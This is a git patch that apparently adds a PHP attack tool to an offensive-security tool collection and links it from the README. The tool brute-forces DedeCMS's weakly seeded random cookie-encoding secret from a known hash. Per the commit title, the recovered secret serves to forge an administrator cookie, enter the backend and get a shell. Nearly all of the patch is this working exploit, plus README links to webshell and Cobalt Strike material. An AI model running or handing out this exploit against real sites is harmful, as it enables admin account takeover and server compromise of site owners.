From 7e225946e5a00135c41b7f656aab3ae6de4ec2f1 Mon Sep 17 00:00:00 2001
From: Mrxn <mrxn.net@gmail.com>
Date: Mon, 6 Jul 2020 18:04:44 +0800
Subject: [PATCH] =?UTF-8?q?add=20DEDECMS=E4=BC=AA=E9=9A=8F=E6=9C=BA?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E5=88=86=E6=9E=90=20(=E4=B8=89)=20=E7=A2=B0?=
 =?UTF-8?q?=E6=92=9E=E7=82=B9(=E7=88=86=E7=A0=B4=EF=BC=8C=E4=BC=AA?=
 =?UTF-8?q?=E9=80=A0=E7=AE=A1=E7=90=86=E5=91=98cookie=E7=99=BB=E9=99=86?=
 =?UTF-8?q?=E5=90=8E=E5=8F=B0getshell?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 README.md                |  2 +
 tools/dede_funcookie.php | 88 ++++++++++++++++++++++++++++++++++++++++
 2 files changed, 90 insertions(+)
 create mode 100644 tools/dede_funcookie.php

diff --git a/README.md b/README.md
index 2785041..42608ca 100644
--- a/README.md
+++ b/README.md
@@ -408,6 +408,7 @@
 - [cloud-ranges-部分公有云IP地址范围](https://github.com/pry0cc/cloud-ranges)
 - [sqltools_ch-sqltools2.0汉化增强版](./ttools/sqltools_ch.rar)
 - [railgun-poc_1.0.1.7-多功能端口扫描/爆破/漏洞利用/编码转换等](./tools/railgun-poc_1.0.1.7.zip)
+- [dede_funcookie.php-DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破，伪造管理员cookie登陆后台getshell](./tools/dede_funcookie.php)
 
 ## <span id="head8"> 文章/书籍/教程相关</span>
 
@@ -495,6 +496,7 @@
 - [踩坑记录-Redis(Windows)的getshell](./books/踩坑记录-Redis(Windows)的getshell.pdf)
 - [Cobal_Strike踩坑记录-DNS Beacon](./books/Cobal_Strike踩坑记录-DNS%20Beacon.pdf)
 - [windows下隐藏webshell的方法](./books/windows下隐藏webshell的方法.md)
+- [DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破，伪造管理员cookie登陆后台getshell](./books/DEDECMS伪随机漏洞分析 (三) 碰撞点.pdf)
 
 ## <span id="head9"> 说明</span>
 
diff --git a/tools/dede_funcookie.php b/tools/dede_funcookie.php
new file mode 100644
index 0000000..450bc15
--- /dev/null
+++ b/tools/dede_funcookie.php
@@ -0,0 +1,88 @@
+<?php
+$t1=microtime(true);
+echo "开始时间: $t1\n";
+//请填写下面的信息
+$cpu = 8; // cpu: CPU核数,$cpu对应到开启的进程的数量,不宜过高
+$attack_method = 2; // 碰撞类型: 如果是用户主页就是1, 自定义表单就是2
+$attack_param = "";  // 数据: 选择1填写uid, 选择2填写dede_fields
+$attack_hash = "";   // hash: 填写hash
+
+$max_ = 4294967296;
+$targets_ = [];
+$the_1 = (int)($max_ / $cpu);
+$the_2 = $max_ % $cpu;
+for ($i = 0; $i < $cpu; $i++){
+    array_push($targets_,[($i)*$the_1,($i+1)*$the_1]);
+}
+$chars='abcdefghigklmnopqrstuvwxwyABCDEFGHIGKLMNOPQRSTUVWXWY0123456789';
+$max = 61; // strlen($chars) - 1;
+$already_test = 0;
+for ($i = 0; $i < $cpu; $i++){
+    $pid = pcntl_fork();
+    if ($pid == -1) {
+        die("could not fork");
+    } elseif ($pid) {
+        ;
+        //echo $pid;
+        //echo "I'm the Parent $i\n";
+    } else {
+        //var_dump($targets_[$i][0]);
+        the_poc($targets_[$i][0],$targets_[$i][1],$i);
+        exit;
+    }
+}
+
+function the_poc($start,$end,$id){
+    global $chars;
+    global $max;
+    global $attack_method;
+    global $attack_param;
+    global $attack_hash;
+    $the_whole = (int)(($end-$start)/1000000);
+    $i_do = 0;
+
+    for($y = $start; $y<= $end; $y++) {
+        if (($i_do%1000000) == 1){
+                echo "$id 已完成(x1000000): ";
+                echo (int)($i_do/1000000);
+                echo "/$the_whole\n";
+        }
+        $i_do = $i_do + 1;
+        srand($y);
+        $length = rand(28,32);
+
+        mt_srand($y);
+        $rnd_cookieEncode='';
+        for($i = 0; $i < $length; $i++) {
+            $rnd_cookieEncode .= $chars[mt_rand(0, $max)];
+        }
+        if ($attack_method==1){
+            if (substr(md5($rnd_cookieEncode.$attack_param),0,16) == $attack_hash){
+                echo "here!!!!\n";
+                echo $rnd_cookieEncode;
+                echo "\n";
+                echo $y;
+                echo "\n";
+                break;
+            }
+        }else{
+            if (md5($attack_param.$rnd_cookieEncode) == $attack_hash){
+                    echo "here!!!!\n";
+                    echo $rnd_cookieEncode;
+                    echo "\n";
+                    echo $y;
+                    echo "\n";
+            }
+        }
+    }
+}
+
+// 等待子进程执行结束
+while (pcntl_waitpid(0, $status) != -1) {
+    $status = pcntl_wexitstatus($status);
+    $pid = posix_getpid();
+    echo "Child $status completed\n";
+}
+$t2=microtime(true)-$t1; //获取程序1，结束的时间
+echo "总计用时: $t2\n";
+?>
\ No newline at end of file